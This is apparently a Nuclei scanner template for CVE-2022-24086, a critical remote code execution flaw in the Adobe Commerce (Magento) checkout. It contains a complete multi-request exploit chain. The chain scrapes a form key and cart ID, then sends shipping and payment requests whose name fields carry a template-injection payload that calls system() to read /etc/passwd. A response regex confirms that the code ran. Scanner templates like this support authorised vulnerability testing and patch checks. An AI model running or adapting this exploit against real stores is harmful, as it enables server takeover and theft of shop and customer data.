id: CVE-2022-24086

info:
  name: Adobe Commerce (Magento) - Remote Code Execution
  author: daffainfo
  severity: critical
  description: |
    Adobe Commerce versions 2.4.3-p1 (and earlier) and 2.3.7-p2 (and earlier) are affected by an improper input validation vulnerability during the checkout process. Exploitation of this issue does not require user interaction and could result in arbitrary code execution.
  impact: |
    Attackers can execute arbitrary code on the server, potentially leading to full system compromise.
  remediation: |
    Update to the latest version of Adobe Commerce that addresses this vulnerability.
  reference:
    - https://helpx.adobe.com/security/products/magento/apsb22-12.html
    - https://vovohelo.medium.com/reversing-a-magento-rce-cve-2022-24086-e991ead4d8af
    - https://labs.watchtowr.com/adobe-commerce-magento-rce-cve-2022-24086/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24086
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-24086
    epss-score: 0.93696
    epss-percentile: 0.99856
    cwe-id: CWE-20
    cpe: cpe:2.3:a:adobe:commerce:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: adobe
    product: commerce
    shodan-query: "X-Magento-Tags"
  tags: cve,cve2022,adobe,magento,commerce,rce,intrusive,kev,vkev

variables:
  random_str: '{{rand_base(5, "abc")}}'
  email: '{{randstr}}@{{rand_base(5)}}.com'
  telephone: "{{rand_int(10000, 99999)}}"

flow: http(1) && http(2) && http(3) && http(4) && http(5)

http:
  - method: GET
    path:
      - '{{BaseURL}}'

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(to_lower(body), "x-magento", "form_key")'
          - 'status_code == 200'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: form_key
        part: body
        group: 1
        regex:
          - 'name="form_key"\s+type="hidden"\s+value="([0-9a-zA-Z]+)"'
        internal: true

  - raw:
      - |
        POST /checkout/cart/add/uenc/{{base64(BaseURL)}}%2C/product/{{product_id}}/ HTTP/1.1
        Host: {{Hostname}}
        Cookie: form_key={{form_key}}
        X-Requested-With: XMLHttpRequest
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2gMM6E6ZIRMtnlg4

        ------WebKitFormBoundary2gMM6E6ZIRMtnlg4
        Content-Disposition: form-data; name="product"

        {{product_id}}
        ------WebKitFormBoundary2gMM6E6ZIRMtnlg4
        Content-Disposition: form-data; name="item"

        {{product_id}}
        ------WebKitFormBoundary2gMM6E6ZIRMtnlg4
        Content-Disposition: form-data; name="form_key"

        {{form_key}}
        ------WebKitFormBoundary2gMM6E6ZIRMtnlg4--

    matchers:
      - type: dsl
        dsl:
          - contains(content_type, "application/json")
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET /checkout HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(to_lower(body), "entity_id", "store_id", "formkey")'
          - 'status_code == 200'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: entity_id
        part: body
        group: 1
        regex:
          - '"entity_id":"([0-9a-zA-Z]+)","store'
        internal: true

  - raw:
      - |
        POST /rest/default/V1/guest-carts/{{entity_id}}/shipping-information HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"addressInformation":{"shipping_address":{"countryId":"FR","regionCode":"","region":"","street":["{{random_str}}"],"company":"","telephone":"{{telephone}}","postcode":"12311","city":"{{random_str}}","firstname":"{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(system).filter(cat$IFS/etc/passwd)}}","lastname":"{{random_str}}"},"billing_address":{"countryId":"FR","regionCode":"","region":"","street":["{{random_str}}"],"company":"","telephone":"{{telephone}}","postcode":"12311","city":"{{random_str}}","firstname":"{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(system).filter(cat$IFS/etc/passwd)}}","lastname":"{{random_str}}","saveInAddressBook":null},"shipping_method_code":"flatrate","shipping_carrier_code":"flatrate","extension_attributes":{}}}

    skip-variables-check: true
    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "payment_methods", "totals")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /rest/default/V1/guest-carts/{{entity_id}}/payment-information HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"cartId":"{{entity_id}}","billingAddress":{"countryId":"FR","regionCode":"","region":"","street":["{{random_str}}"],"company":"","telephone":"{{telephone}}","postcode":"12311","city":"{{random_str}}","firstname":"{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(system).filter(cat$IFS/etc/passwd)}}","lastname":"{{random_str}}","saveInAddressBook":null},"paymentMethod":{"method":"checkmo","po_number":null,"additional_data":null},"email":"{{email}}"}

    skip-variables-check: true
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a0046304402200fb52680117a3666823a5acfdd29e85df9991a9034a72865c4d6155519d2258202204ccd552480a5616498fe628c12a50347a4c06fd87073bf2a27ab4c7bfc3a09ba:922c64590222798bb761d5b6d8e72950